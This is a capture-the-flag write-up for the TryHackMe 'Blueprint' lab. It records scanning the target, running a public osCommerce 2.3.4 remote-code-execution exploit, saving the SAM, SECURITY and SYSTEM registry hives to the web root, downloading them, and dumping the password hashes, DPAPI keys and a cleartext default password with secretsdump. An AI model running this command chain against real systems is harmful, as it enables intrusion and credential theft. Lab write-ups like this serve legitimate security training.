TryHackMe Blueprint

nmap

nmap -sV  10.10.239.229     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 17:40 EST
Nmap scan report for 10.10.239.229
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
135/tcp   open  msrpc?
139/tcp   open  netbios-ssn?
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  unknown
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.94SVN%I=7%D=2/8%Time=65C5589E%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,5,"\x83\0\0\x01\x8f");
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.32 seconds

Web Exploitation

feroxbuster -u http://10.10.239.229:8080 --silent
http://10.10.239.229:8080/oscommerce-2.3.4 => http://10.10.239.229:8080/oscommerce-2.3.4/

OsCommerce 2.3.4 https://www.exploit-db.com/exploits/50128

wget https://www.exploit-db.com/raw/50128             
--2024-02-08 18:03:03--  https://www.exploit-db.com/raw/50128
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2501 (2.4K) [text/plain]
Saving to: ‘50128’

50128                                   100%[=============================================================================>]   2.44K  --.-KB/s    in 0s      

2024-02-08 18:03:04 (18.8 MB/s) - ‘50128’ saved [2501/2501]

┌──(kali㉿kali)-[~]
└─$ mv 50128 oscommerceExploit.py                                   
                                                                                                                                                              
┌──(kali㉿kali)-[~]
└─$ python oscommerceExploit.py http://10.10.239.229:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system

RCE_SHELL$ reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
The operation completed successfully.

RCE_SHELL$ reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save                
The operation completed successfully.

RCE_SHELL$ reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save
The operation completed successfully.

Now these can be downloaded from the webserver

┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/sam.save                                     
--2024-02-08 18:09:46--  http://10.10.239.229:8080/oscommerce-2.3.4/sam.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘sam.save’

sam.save                               100%[============================================================================>]  24.00K  7.89KB/s    in 3.0s    

2024-02-08 18:09:49 (7.89 KB/s) - ‘sam.save’ saved [24576/24576]

                                                                                                                                                            
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/security.save
--2024-02-08 18:09:55--  http://10.10.239.229:8080/oscommerce-2.3.4/security.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘security.save’

security.save                          100%[============================================================================>]  24.00K  37.9KB/s    in 0.6s    

2024-02-08 18:09:56 (37.9 KB/s) - ‘security.save’ saved [24576/24576]

                                                                                                                                                            
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/system.save  
--2024-02-08 18:10:01--  http://10.10.239.229:8080/oscommerce-2.3.4/system.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12795904 (12M)
Saving to: ‘system.save’

system.save                            100%[============================================================================>]  12.20M  1.12MB/s    in 13s     

2024-02-08 18:10:15 (949 KB/s) - ‘system.save’ saved [12795904/12795904]

Hash Dumping

python /opt/impacket/examples/secretsdump.py -sam /home/kali/Downloads/sam.save -security /home/kali/Downloads/security.save -system /home/kali/Downloads/system.save LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x147a48de4a9815d2aa479598592b086f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):malware
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x9bd2f17b538da4076bf2ecff91dddfa93598c280
dpapi_userkey:0x251de677564f950bb643b8d7fdfafec784a730d1
[-] NTDSHashes.__init__() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...

admin

notice that webshell is already admin.

RCE_SHELL$ whoami
nt authority\system

PreviousTryHackMe Ice NextTryHackMe VulnNet: Roasted

Last updated 10 months ago